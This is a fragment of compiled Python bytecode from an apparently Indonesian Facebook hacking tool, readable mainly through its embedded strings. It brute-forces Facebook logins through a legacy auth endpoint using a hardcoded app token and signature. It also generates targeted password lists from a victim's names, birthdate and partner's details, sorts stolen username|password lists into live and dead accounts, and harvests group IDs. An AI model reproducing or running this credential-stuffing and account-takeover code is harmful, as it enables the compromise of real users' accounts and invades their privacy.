\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00NR\x90\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0f\x00\x00\x00/?access_token=R\xb2\x00\x00\x00R\xb7\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x1e\x00\x00\x00\x1b[1;97m[ \x1b[1;92mDone\x1b[1;97m ] R\xd4\x00\x00\x00s\x03\x00\x00\x00 
=>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x10\x00\x00\x00out/super_cp.txtRm\x00\x00\x00s\x01\x00\x00\x00\nR\xb5\x00\x00\x00R\xb3\x00\x00\x00t\x07\x00\x00\x00gantengR\xb6\x00\x00\x00(\x12\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R4\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00t\x03\x00\x00\x00oksR\x94\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R\xdb\x00\x00\x00(\x0e\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00userRm\x00\x00\x00R\xe1\x00\x00\x00t\x05\x00\x00\x00pass1Rl\x00\x00\x00R~\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00t\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4t\x05\x00\x00\x00pass5(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00main;\x05\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x02\x1b\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x06\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x14\x03\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x1f\x01\x12\x01\x1d\x01\x14\x02\x10\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal OK/CP \x1b[1;91m: \x1b[1;92ms\x0f\x00\x00\x00\x1b[1;97m/\x1b[1;93ms@\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCP File saved \x1b[1;91m: \x1b[1;97mout/super_cp.txt(\x1c\x00\x00\x00R/\x00\x00\x00R\xe3\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R 
x00\x17}\x11\x00|\x02\x00j\x0b\x00|\n\x00t\x0c\x00|\x11\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x18\x04Wd\x11\x00}\x12\x00x5\x00|\x12\x00d\x1a\x00k\x00\x00r\x8a\x04|\x12\x00d\x06\x00\x17}\x12\x00|\x02\x00j\x0b\x00|\x05\x00t\x0c\x00|\x12\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01qV\x04Wd\x11\x00}\x13\x00x5\x00|\x13\x00d\x1a\x00k\x00\x00r\xc8\x04|\x13\x00d\x06\x00\x17}\x13\x00|\x02\x00j\x0b\x00|\x0b\x00t\x0c\x00|\x13\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x94\x04W|\x02\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHd\x1d\x00|\x01\x00\x16GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01Wn)\x00\x04t\x04\x00k\n\x00r/\x05\x01}\x06\x00\x01d\x1f\x00GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mFill in the complete data of the target belowi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: s\x04\x00\x00\x00.txtR\x11\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: s>\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: i\x00\x00\x00\x00i\x02\x00\x00\x00i\x04\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :vs&\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: sD\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...s\xfc\x01\x00\x00%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%sid\x00\x00\x00s\x01\x00\x00\x00\ng\x00\x00\x00\x00\x00\x00\xf8?s/\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97m %s.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x11\x00\x00\x00\x1b[1;91m[!] 
Failed(\x0f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00Rg\x00\x00\x00R@\x01\x00\x00(\x14\x00\x00\x00R4\x00\x00\x00Rm\x00\x00\x00R\xcc\x00\x00\x00R\xe1\x00\x00\x00R\xe2\x00\x00\x00R\x12\x00\x00\x00R\x1f\x00\x00\x00R0\x01\x00\x00t\x01\x00\x00\x00gt\x01\x00\x00\x00hR\x13\x00\x00\x00R\x1a\x00\x00\x00t\x01\x00\x00\x00kt\x01\x00\x00\x00lt\x01\x00\x00\x00mR\xa8\x00\x00\x00t\x02\x00\x00\x00wgt\x02\x00\x00\x00ent\x04\x00\x00\x00wordt\x03\x00\x00\x00gen(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xfb\x00\x00\x00\xfb\x08\x00\x00sx\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\r\x01\x05\x01\x05\x01\t\x01\x0c\x01\x13\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x01\n\x01\t\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\r\x01\r\x01\n\x01\xff\x00\xff\x00}\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\x06\x01\x0f\x01\n\x01\x1f\x01\n\x01\r\x01\t\x01\t\x01\n\x01\x0b\x01\x0f\x01\x05\x01\n\x01c\x00\x00\x00\x00\r\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s@\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHg\x00\x00}\x01\x00g\x00\x00}\x02\x00g\x00\x00}\x03\x00y%\x00t\t\x00d\n\x00\x83\x01\x00}\x04\x00t\x02\x00|\x04\x00d\x03\x00\x83\x02\x00j\n\x00\x83\x00\x00}\x05\x00Wn\'\x00\x04t\x04\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xt\t\x00d\r\x00\x83\x01\x00}\x06\x00t\x0c\x00d\x0e\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHx\xe2\x00|\x05\x00D]\xda\x00}\x07\x00|\x07\x00j\r\x00\x83\x00\x00j\x0e\x00t\x0f\x00|\x06\x00\x83\x01\x00\x83\x01\x00\\\x02\x00}\x08\x00}\t\x00d\x0f\x00|\x08\x00\x17d\x10\x00\x17|\t\x00\x17d\x11\x00\x17}\n\x00t\x10\x00j\x11\x00|\n\x00\x83\x01\x00}\x0b\x00t\x12\x00j\x13\x00|\x0b\x00j\x14\x00\x83\x01\x00}\x0c\x00d\x12\x00|\x0c\x00k\x06\x00r\x92\x01|\x01\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x13\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01d\x15\x00|\x0c\x00d\x16\x00\x19k\x06\x00r\xc3\x01|\x02\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x17\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01|\x03\x00j\x15\x00|\t\x00\x83\x01\x00\x01d\x18\x00|\x08\x00\x17d\x14\x00\x17|\t\x00\x17GHq\x07\x01Wd\x08\x00d\t\x00\x14GHd\x19\x00t\x0f\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17t\x0f\x00t\x16\x00|\x02\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\x0f\x00t\x16\x00|\x03\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0c\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sB\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mCreate in file\x1b[1;91m : \x1b[1;97musername|passwordi*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m:\x1b[1;97m s\x19\x00\x00\x00\x1b[1;91m[!] 
File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s%\x00\x00\x00\x1b[1;97m[ \x1b[1;92mLive\x1b[1;97m ] \x1b[1;97mR\xd4\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s&\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCheck\x1b[1;97m ] \x1b[1;97ms$\x00\x00\x00\x1b[1;97m[ \x1b[1;91mDie\x1b[1;97m ] \x1b[1;97ms4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92ms\x15\x00\x00\x00 \x1b[1;97mCheck=\x1b[1;93ms\x13\x00\x00\x00 \x1b[1;97mDie=\x1b[1;91m(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R@\x01\x00\x00R \x00\x00\x00R\xd8\x00\x00\x00R\xd5\x00\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x94\x00\x00\x00R\x0e\x00\x00\x00(\r\x00\x00\x00R4\x00\x00\x00t\x04\x00\x00\x00liveR7\x00\x00\x00t\x03\x00\x00\x00dieR\xcc\x00\x00\x00t\x04\x00\x00\x00listt\x07\x00\x00\x00pemisaht\x04\x00\x00\x00mekiR\xde\x00\x00\x00RC\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R\xdf\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RB\x01\x00\x008\t\x00\x00sT\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x06\x01\x06\x01\x06\x01\x03\x01\x0c\x01\x19\x01\r\x01\x05\x01\n\x01\x0b\x01\x0c\x01\n\x01\t\x01\r\x01!\x01\x16\x01\x0f\x01\x12\x01\x0c\x01\r\x01\x14\x01\x10\x01\r\x01\x14\x02\r\x01\x15\x01\t\x01=\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1a\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHy\xd4\x00t\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00xp\x00|\x02\x00d\t\x00\x19D]d\x00}\x03\x00|\x03\x00d\n\x00\x19}\x04\x00|\x03\x00d\x0b\x00\x19}\x05\x00t\x02\x00d\x0c\x00d\r\x00\x83\x02\x00}\x06\x00t\x10\x00j\x11\x00|\x05\x00\x83\x01\x00\x01|\x06\x00j\x12\x00|\x05\x00d\x0e\x00\x17\x83\x01\x00\x01d\x0f\x00t\x13\x00|\x05\x00\x83\x01\x00\x17d\x10\x00\x17t\x13\x00|\x04\x00\x83\x01\x00\x17GHq\xca\x00Wd\x11\x00d\x12\x00\x14GHd\x13\x00t\x14\x00t\x10\x00\x83\x01\x00\x16GHd\x14\x00GH|\x06\x00j\x15\x00\x83\x00\x00\x01t\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\xa8\x00\x04t\x18\x00t\x19\x00f\x02\x00k\n\x00r\x9a\x01\x01\x01\x01d\x16\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n|\x00\x04t\x1a\x00k\n\x00r\xcd\x01\x01\x01\x01t\x00\x00j\x1b\x00d\x0c\x00\x83\x01\x00\x01d\x17\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01nI\x00\x04t\x0b\x00j\x1c\x00j\x1d\x00k\n\x00r\xef\x01\x01\x01\x01d\x18\x00GHt\x1e\x00\x83\x00\x00\x01n\'\x00\x04t\x04\x00k\n\x00r\x15\x
02\x01\x01\x01d\x19\x00GHt\x16\x00d\x15\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00https://graph.facebook.com/me/groups?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00out/Grupid.txtR\x11\x00\x00\x00s\x01\x00\x00\x00\ns!\x00\x00\x00\x1b[1;97m[ \x1b[1;92mMyGroup\x1b[1;97m ] s\x04\x00\x00\x00 => i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal Group \x1b[1;91m:\x1b[1;97m %ss6\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSaved \x1b[1;91m: \x1b[1;97mout/Grupid.txts\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No Connections\x10\x00\x00\x00\x1b[1;91m[!] Error(\x1f\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00listgrupR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00R,\x00\x00\x00t\x06\x00\x00\x00removeRi\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00uht\x03\x00\x00\x00gudR\xf1\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RC\x01\x00\x00f\t\x00\x00s\\\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x0f\x01\r\x01\x11\x01!\x01\t\x01\x0f\x01\x05\x01\n\x01\n\x01\x0b\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x00\x00|\x00\x00d\x0c\x00k\x02\x00r\xb4\x00d\r\x00}\x01\x00t\x0b\x00t\x04\x00|\x01\x00\x83\x02\x00\x01nU\x00|\x00\x00d\x0e\x00k\x02\x00r\xd6\x00d\x0f\x00}\x02\x00t\x0b\x00t\x04\x00|\x02\x00\x83\x02\x00\x01n3\x00|\x00\x00d\x10\x00k\x02\x00r\xec\x00t\x0c\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x11\x00k\x02\x00r\x02\x01t\r\x00\x83\x00\x00\x01n\x07\x00t\r\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Activates2\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Not activates*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR8\x00\x00\x00t\x04\x00\x00\x00trueR9\x00\x00\x00t\x05\x00\x00\x00falseR:\x00\x00\x00R\n\x00\x00\x00(\x0e\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xc4\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x03\x00\x00\x00RH\x01\x00\x00t\x05\x00\x00\x00aktift\x03\x00\x00\x00non(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RD\x01\x00\x00\x97\t\x00\x00s4\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\x06\x01\x10\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x01\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s3\x00\x00\x00d\x01\x00|\x00\x00\x16}\x01\x00t\x00\x00j\x01\x00|\x01\x00\x83\x01\x00}\x02\x00t\x02\x00j\x03\x00|\x02\x00j\x04\x00\x83\x01\x00}\x03\x00|\x03\x00d\x02\x00\x19S(\x03\x00\x00\x00Ns-\x00\x00\x00https://graph.facebook.com/me?access_token=%sRj\x00\x00\x00(\x05\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00RG\x01\x00\x00t\x03\x00\x00\x00uid(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\n\x00\x00\x00get_userid\xb5\t\x00\x00s\x08\x00\x00\x00\x00\x01\n\x01\x0f\x01\x12\x01c\x02\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00}\x02\x00d\x01\x00|\x01\x00t\x01\x00|\x02\x00\x83\x01\x00f\x02\x00\x16}\x03\x00i\x02\x00d\x02\x00d\x03\x006d\x04\x00|\x00\x00\x16d\x05\x006}\x04\x00d\x06\x00}\x05\x00t\x02\x00j\x03\x00|\x05\x00d\x07\x00|\x03\x00d\x08\x00|\x04\x00\x83\x01\x02}\x06\x00|\x06\x00j\x04\x00GHd\t\x00|\x06\x00j\x04\x00k\x06\x00r\x9d\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0b\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nF\x00d\r\x00|\x06\x00j\x04\x00k\x06\x00r\xd7\x00t\x05\x00j\x06\x00d\n\x00\x83\x01\x00\x01t\x07\x00GHd\x0e\x00GHt\x08\x00d\x0c\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01n\x0c\x00d\x0f\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x8a\x01\x00\x00variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutations!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Types\x08\x00\x00\x00OAuth %st\r\x00\x00\x00Authorizations"\x00\x00\x00https://graph.facebook.com/graphqlRl\x00\x00\x00t\x07\x00\x00\x00headerss\x12\x00\x00\x00"is_shielded":trueR&\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivates\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x13\x00\x00\x00"is_shielded":falses.\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mNot activates\x10\x00\x00\x00\x1b[1;91m[!] 
Error(\x0b\x00\x00\x00R_\x01\x00\x00R\x17\x00\x00\x00Rb\x00\x00\x00Rh\x00\x00\x00Rf\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00R\x08\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x06\x00\x00\x00enableRj\x00\x00\x00Rl\x00\x00\x00Ra\x01\x00\x00Rk\x00\x00\x00RG\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xc4\x00\x00\x00\xbb\t\x00\x00s(\x00\x00\x00\x00\x01\x0c\x01\x16\x01\x18\x01\x06\x01\x1b\x01\x08\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x01\x0f\x01\r\x01\x05\x01\x05\x01\n\x01\n\x02\x05\x01(\x02\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 